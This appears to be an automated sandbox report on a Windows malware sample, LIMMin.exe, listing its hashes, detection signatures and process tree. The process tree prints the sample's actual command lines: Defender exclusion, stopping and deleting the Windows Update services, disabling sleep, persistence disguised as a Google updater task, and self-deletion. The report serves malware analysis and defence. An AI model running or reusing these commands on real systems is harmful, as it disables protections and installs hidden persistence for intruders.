Overview
overview
10Static
static
106523.exe
windows7-x64
106523.exe
windows10-2004-x64
10Amdau.exe
windows7-x64
10Amdau.exe
windows10-2004-x64
10CLEP.exe
windows7-x64
10CLEP.exe
windows10-2004-x64
10DCKA.exe
windows7-x64
10DCKA.exe
windows10-2004-x64
10DEV.exe
windows7-x64
10DEV.exe
windows10-2004-x64
10DEVMin.exe
windows7-x64
10DEVMin.exe
windows10-2004-x64
10DevSt.exe
windows7-x64
1DevSt.exe
windows10-2004-x64
1Documents-...uz.exe
windows7-x64
7Documents-...uz.exe
windows10-2004-x64
5IqXYLXKzl6.exe
windows7-x64
IqXYLXKzl6.exe
windows10-2004-x64
1LEMON.exe
windows7-x64
10LEMON.exe
windows10-2004-x64
10LIMMin.exe
windows7-x64
10LIMMin.exe
windows10-2004-x64
10LIMSt.exe
windows7-x64
1LIMSt.exe
windows10-2004-x64
1LK2.exe
windows7-x64
10LK2.exe
windows10-2004-x64
10NINJA.exe
windows7-x64
7NINJA.exe
windows10-2004-x64
7PolymodXT.exe
windows7-x64
10PolymodXT.exe
windows10-2004-x64
10UM.exe
windows7-x64
10UM.exe
windows10-2004-x64
10Analysis
-
max time kernel
121s -
max time network
138s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
13-10-2023 02:17
Behavioral task
behavioral1
Sample
6523.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
6523.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
Amdau.exe
Resource
win7-20230831-en
Behavioral task
behavioral4
Sample
Amdau.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
CLEP.exe
Resource
win7-20230831-en
Behavioral task
behavioral6
Sample
CLEP.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
DCKA.exe
Resource
win7-20230831-en
Behavioral task
behavioral8
Sample
DCKA.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
DEV.exe
Resource
win7-20230831-en
Behavioral task
behavioral10
Sample
DEV.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
DEVMin.exe
Resource
win7-20230831-en
Behavioral task
behavioral12
Sample
DEVMin.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
DevSt.exe
Resource
win7-20230831-en
Behavioral task
behavioral14
Sample
DevSt.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
Documents-EnemyFrauz.exe
Resource
win7-20230831-en
Behavioral task
behavioral16
Sample
Documents-EnemyFrauz.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
IqXYLXKzl6.exe
Resource
win7-20230831-en
Behavioral task
behavioral18
Sample
IqXYLXKzl6.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
LEMON.exe
Resource
win7-20230831-en
Behavioral task
behavioral20
Sample
LEMON.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral21
Sample
LIMMin.exe
Resource
win7-20230831-en
Behavioral task
behavioral22
Sample
LIMMin.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral23
Sample
LIMSt.exe
Resource
win7-20230831-en
Behavioral task
behavioral24
Sample
LIMSt.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral25
Sample
LK2.exe
Resource
win7-20230831-en
Behavioral task
behavioral26
Sample
LK2.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral27
Sample
NINJA.exe
Resource
win7-20230831-en
Behavioral task
behavioral28
Sample
NINJA.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral29
Sample
PolymodXT.exe
Resource
win7-20230831-en
Behavioral task
behavioral30
Sample
PolymodXT.exe
Resource
win10v2004-20230915-en
Behavioral task
behavioral31
Sample
UM.exe
Resource
win7-20230831-en
Behavioral task
behavioral32
Sample
UM.exe
Resource
win10v2004-20230915-en
General
-
Target
LIMMin.exe
-
Size
3.6MB
-
MD5
d0525e69e54066d5b3764acefd16a754
-
SHA1
513304e7eca83acedad4655a135a6f4c2c1f4aed
-
SHA256
d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce
-
SHA512
b958797b913b1860daa2cdf4f6741835042e170fea4c4b5f3ae61432a9e24054dbcd40dbc4871d19b12d3f40d90523490caa37e6152d66850c05f18b7d738f03
-
SSDEEP
98304:vKNU8zvQiW+xPSCcgu3ebV6GDRjar2H2wKr3:avhWXrycG1jamKr3
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 2040 created 1204 2040 LIMMin.exe 21 PID 2040 created 1204 2040 LIMMin.exe 21 PID 2040 created 1204 2040 LIMMin.exe 21 PID 2040 created 1204 2040 LIMMin.exe 21 PID 2040 created 1204 2040 LIMMin.exe 21 -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts LIMMin.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
pid Process 1176 cmd.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2576 sc.exe 2720 sc.exe 2716 sc.exe 2584 sc.exe 1588 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1612 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2040 LIMMin.exe 2040 LIMMin.exe 1956 powershell.exe 2040 LIMMin.exe 2040 LIMMin.exe 2040 LIMMin.exe 2040 LIMMin.exe 2040 LIMMin.exe 2040 LIMMin.exe 2688 powershell.exe 2040 LIMMin.exe 2040 LIMMin.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1956 powershell.exe Token: SeShutdownPrivilege 2840 powercfg.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeShutdownPrivilege 2580 powercfg.exe Token: SeShutdownPrivilege 2464 powercfg.exe Token: SeShutdownPrivilege 2532 powercfg.exe -
Suspicious use of WriteProcessMemory 48 IoCs
description pid Process procid_target PID 2612 wrote to memory of 2576 2612 cmd.exe 34 PID 2612 wrote to memory of 2576 2612 cmd.exe 34 PID 2612 wrote to memory of 2576 2612 cmd.exe 34 PID 2612 wrote to memory of 2720 2612 cmd.exe 37 PID 2612 wrote to memory of 2720 2612 cmd.exe 37 PID 2612 wrote to memory of 2720 2612 cmd.exe 37 PID 2612 wrote to memory of 2716 2612 cmd.exe 38 PID 2612 wrote to memory of 2716 2612 cmd.exe 38 PID 2612 wrote to memory of 2716 2612 cmd.exe 38 PID 2612 wrote to memory of 2584 2612 cmd.exe 39 PID 2612 wrote to memory of 2584 2612 cmd.exe 39 PID 2612 wrote to memory of 2584 2612 cmd.exe 39 PID 2612 wrote to memory of 1588 2612 cmd.exe 40 PID 2612 wrote to memory of 1588 2612 cmd.exe 40 PID 2612 wrote to memory of 1588 2612 cmd.exe 40 PID 2616 wrote to memory of 2840 2616 cmd.exe 41 PID 2616 wrote to memory of 2840 2616 cmd.exe 41 PID 2616 wrote to memory of 2840 2616 cmd.exe 41 PID 2612 wrote to memory of 2788 2612 cmd.exe 42 PID 2612 wrote to memory of 2788 2612 cmd.exe 42 PID 2612 wrote to memory of 2788 2612 cmd.exe 42 PID 2616 wrote to memory of 2580 2616 cmd.exe 43 PID 2616 wrote to memory of 2580 2616 cmd.exe 43 PID 2616 wrote to memory of 2580 2616 cmd.exe 43 PID 2616 wrote to memory of 2464 2616 cmd.exe 44 PID 2616 wrote to memory of 2464 2616 cmd.exe 44 PID 2616 wrote to memory of 2464 2616 cmd.exe 44 PID 2612 wrote to memory of 2476 2612 cmd.exe 48 PID 2612 wrote to memory of 2476 2612 cmd.exe 48 PID 2612 wrote to memory of 2476 2612 cmd.exe 48 PID 2612 wrote to memory of 2484 2612 cmd.exe 45 PID 2612 wrote to memory of 2484 2612 cmd.exe 45 PID 2612 wrote to memory of 2484 2612 cmd.exe 45 PID 2616 wrote to memory of 2532 2616 cmd.exe 47 PID 2616 wrote to memory of 2532 2616 cmd.exe 47 PID 2616 wrote to memory of 2532 2616 cmd.exe 47 PID 2612 wrote to memory of 2544 2612 cmd.exe 46 PID 2612 wrote to memory of 2544 2612 cmd.exe 46 PID 2612 wrote to memory of 2544 2612 cmd.exe 46 PID 2612 wrote to memory of 2588 2612 cmd.exe 49 PID 2612 wrote to memory of 2588 2612 cmd.exe 49 PID 2612 wrote to memory of 2588 2612 cmd.exe 49 PID 2688 wrote to memory of 1612 2688 powershell.exe 50 PID 2688 wrote to memory of 1612 2688 powershell.exe 50 PID 2688 wrote to memory of 1612 2688 powershell.exe 50 PID 1176 wrote to memory of 1652 1176 cmd.exe 54 PID 1176 wrote to memory of 1652 1176 cmd.exe 54 PID 1176 wrote to memory of 1652 1176 cmd.exe 54 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1204
-
C:\Users\Admin\AppData\Local\Temp\LIMMin.exe"C:\Users\Admin\AppData\Local\Temp\LIMMin.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
PID:2040
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2576
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2720
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2716
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2584
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1588
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:2788
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2484
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:2544
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:2476
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uwjcnslmt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'3⤵
- Creates scheduled task(s)
PID:1612
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\LIMMin.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1176
-
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵PID:1652
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5a593b2b29903f58dbd726714927a78d5
SHA1cc694d3201b49866f634c771e2f0047f8a9142a3
SHA256713b03519845e03fbd50fd790b2b148d2c898b86a8bfdd39ec695f648b21f59c
SHA51281cfdada5aa9f4a9efbe1f3e642f026bcf6b0d196a3a4d6b2c28b5d99a718318a8ec910736d4c18d51ed7cb1e7d71dd3c4fbcf06aec71de5fe5af579b174098a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B0TU7QYSF6R78QK7JG3F.temp
Filesize7KB
MD5a593b2b29903f58dbd726714927a78d5
SHA1cc694d3201b49866f634c771e2f0047f8a9142a3
SHA256713b03519845e03fbd50fd790b2b148d2c898b86a8bfdd39ec695f648b21f59c
SHA51281cfdada5aa9f4a9efbe1f3e642f026bcf6b0d196a3a4d6b2c28b5d99a718318a8ec910736d4c18d51ed7cb1e7d71dd3c4fbcf06aec71de5fe5af579b174098a